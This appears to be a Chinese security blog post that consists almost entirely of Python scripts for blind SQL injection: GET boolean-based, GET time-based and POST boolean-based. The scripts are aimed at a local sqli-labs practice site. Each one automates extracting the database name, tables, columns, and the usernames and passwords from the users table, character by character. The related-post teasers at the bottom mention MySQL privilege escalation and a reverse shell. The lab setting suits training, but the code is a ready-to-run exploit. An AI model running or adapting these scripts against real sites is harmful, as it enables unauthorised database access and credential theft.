IE安全(盲注py腳本)

原創 周雄雄 2020-06-23 01:19

GET布爾盲注

import requests
import time
import datetime
   # 獲取數據庫名長度
def database_len():
       for i in range(1, 10):
           url = '''http://10.211.55.7/sqli-labs-master/Less-8/'''
           payload = '''?id=1' and length(database())>%s''' % i
           # print(url+payload+'%23')
           r = requests.get(url + payload + '%23')
           if 'You are in' not in r.text:
              #print(i)
  
           #else:
              print('database_length:', i)
              break
  
  
database_len()
  
  #獲取數據庫名
def database_name():
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (
                 j, i)
             # print(url+'%23')
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('database_name:', name)
 
 
database_name()
 
 # 獲取數據庫表
def tables_name():
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
                 j, i) 
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('table_name:', name)
 
 
tables_name()
 
 
 # 獲取表中字段
def columns_name():
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('column_name:', name)
 

columns_name()
 
 
 # 獲取username
def username_value():
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                name = name + i
 
                # print(name)
 
                break
     print('username_value:', name)
 
 
username_value()
 
 
 # 獲取password
def password_value():
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = "http://10.211.55.7/sqli-labs-master/Less-8/?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
                 j, i)
             r = requests.get(url + '%23')
             if 'You are in' in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('password_value:', name)
 
 
password_value()

GET時間盲注

import datetime
import requests
import time
  
  # 獲取數據庫名長度
def database_len():
     for i in range(1, 10):
         url = '''http://10.211.55.7/sqli-labs-master/Less-10/'''
         payload = '''?id=1" and if(length(database())>%s,sleep(1),0)''' % i
         # print(url+payload+'%23')
         time1 = datetime.datetime.now()
         r = requests.get(url + payload + '%23')
         time2 = datetime.datetime.now()
         sec = (time2 - time1).seconds
         if sec >= 1:
             print(i)
         else:
             print(i)
             break
     print('database_len:', i)
 
database_len()

    # 獲取數據庫名
def database_name():
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
             payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
             # print(url+payload+'%23')
             time1 = datetime.datetime.now()
             r = requests.get(url + payload + '%23')
             time2 = datetime.datetime.now()
             sec = (time2 - time1).seconds
             if sec >= 1:
                 name += i
                 # print(name)
                 break
     print('database_name:', name)
 
 
database_name()

  # 獲取數據庫表

def table_name():
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
             payload = '''?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
             # print(url+payload+'%23')
             time1 = datetime.datetime.now()
             r = requests.get(url + payload + '%23')
             time2 = datetime.datetime.now()
             sec = (time2 - time1).seconds
             if sec >= 1:
                 name += i
                 # print(name)
                 break
     print('table_name:', name)
 
 
table_name()

# 獲取表中字段
def column_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('column_name:',name)
column_name()


# 獲取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(username) from users ),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('username_value:',name)
username_value()

# 獲取username
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = '''http://10.211.55.7/sqli-labs-master/Less-9/'''
            payload = '''?id=1' and if(substr((select group_concat(password) from users ),%d,1)='%s',sleep(1),1)''' % (
                 j, i)
            time1 = datetime.datetime.now()
            r = requests.get(url+payload+'%23')
            time2 = datetime.datetime.now()
            sec = (time2-time1).seconds
            if sec >=1:
                name += i
                # print(name)
                break
    print('password_value:',name)
password_value()

POST布爾盲注

import requests
   
   # 獲取數據庫名長度
def database_len():
       for i in range(1, 10):
           url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
           payload = '''admin") and length(database())>%s #''' % i
           data = {'uname':payload,'passwd':'admin'}
           # print(url+payload+'%23')
           r = requests.post(url, data)
           if 'flag.jpg'  in r.text:
              print(i)
  
           else:
              print('database_length:', i)
              break 
database_len()

 #獲取數據庫名
def database_name():
     name = ''
     for j in range(1, 9):
         for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
             url = '''http://10.211.55.7/sqli-labs-master/Less-16/'''
             payload = "admin' and substr(database(),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('database_name:', name)
database_name()

 #獲取數據庫表
def table_name():
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('table_name:', name)
table_name()

#獲取表中字段名
def column_name():
     name = ''
     for j in range(1, 30):
         for i in 'abcdefghijklmnopqrstuvwxyz,':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('column_name:', name)
column_name()

#獲取username
def username_value():
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(username) from security.users),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('username_value:', name)
username_value()

#獲取password
def password_value():
     name = ''
     for j in range(1, 100):
         for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
             url = '''http://10.211.55.7/sqli-labs-master/Less-15/'''
             payload = "admin' and substr((select group_concat(password) from security.users),%d,1)='%s' #" % (
                 j, i)
             data = {'uname':payload,'passwd':'admin'}
             # print(url+'%23')
             r = requests.post(url,data)
             if 'flag.jpg'  in r.text:
                 name = name + i
 
                 # print(name)
 
                 break
     print('password_value:', name)
password_value()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Mysql提權之反彈shell

0x01 介紹 Mysql反彈shell提權,也是屬於udf提權,只不過應用場景不同,例如沒有得到webshell,但是獲得了Mysql的root密碼,恰好目標的數據庫可以外連,那麼就可以先將udf.dll文件的內容先插入到數據表

周雄雄 2020-06-23 01:19:53

什麼是content-type

這是抓取的一個http包的部分截圖 在該截圖中的content-type字段顯示的是:application/json 那什麼是content-type呢? Content-Type(內容類型),一般是指網頁中存在的 Conte

周雄雄 2020-06-23 01:19:53

Mysql提權前奏

Mysql的提權原理就是讓Mysql能夠執行系統的命令 一、Mysql提權的必備條件 服務器安裝Mysql數據庫 利用Mysql提權的前提就是服務器安裝了Mysql服務器,且Mysql的服務沒有降權,Mysql安裝默認是以系統

周雄雄 2020-06-23 01:19:53

IE安全(協議棧安全)

ARP僞造攻擊 在局域網中,當想要訪問一臺主機,但是隻知道主機的ip,這時源主機就會在局域網中廣播發送ARP包來學習目的主機的ip對應的mac地址 ARP僞造攻擊就是第三方hacker主機在收到ARP廣播包時,用ARP包中的請

周雄雄 2020-06-23 01:19:53

IE安全(什麼是信息安全)

信息安全是指通過採用計算機軟硬件技術、網絡技術、密鑰技術等安全技術和各種組織管理措施,來保護信息在其神祕週期內的產生、傳輸、交換、處理和存儲的各個環節中,信息的機密性、完整性和可用性不被破壞 網絡安全黃金三角 機密性 加密技術

周雄雄 2020-06-23 01:19:53

Mysql提權之udf提權

周雄雄 2020-04-16 04:18:10

快速判斷字符串是不是base64編碼

周雄雄 2020-04-04 18:49:57

Mysql提權之反彈shell

0x01 介紹 Mysql反彈shell提權,也是屬於udf提權,只不過應用場景不同,例如沒有得到webshell,但是獲得了Mysql的root密碼,恰好目標的數據庫可以外連,那麼就可以先將udf.dll文件的內容先插入到數據表

周雄雄 2020-06-23 01:19:53

什麼是content-type

這是抓取的一個http包的部分截圖 在該截圖中的content-type字段顯示的是:application/json 那什麼是content-type呢? Content-Type(內容類型),一般是指網頁中存在的 Conte

周雄雄 2020-06-23 01:19:53

Mysql提權前奏

Mysql的提權原理就是讓Mysql能夠執行系統的命令 一、Mysql提權的必備條件 服務器安裝Mysql數據庫 利用Mysql提權的前提就是服務器安裝了Mysql服務器,且Mysql的服務沒有降權,Mysql安裝默認是以系統

周雄雄 2020-06-23 01:19:53

IE安全(協議棧安全)

ARP僞造攻擊 在局域網中,當想要訪問一臺主機,但是隻知道主機的ip,這時源主機就會在局域網中廣播發送ARP包來學習目的主機的ip對應的mac地址 ARP僞造攻擊就是第三方hacker主機在收到ARP廣播包時,用ARP包中的請

周雄雄 2020-06-23 01:19:53

IE安全(什麼是信息安全)

信息安全是指通過採用計算機軟硬件技術、網絡技術、密鑰技術等安全技術和各種組織管理措施,來保護信息在其神祕週期內的產生、傳輸、交換、處理和存儲的各個環節中,信息的機密性、完整性和可用性不被破壞 網絡安全黃金三角 機密性 加密技術

周雄雄 2020-06-23 01:19:53

Mysql提權之udf提權

周雄雄 2020-04-16 04:18:10

快速判斷字符串是不是base64編碼

周雄雄 2020-04-04 18:49:57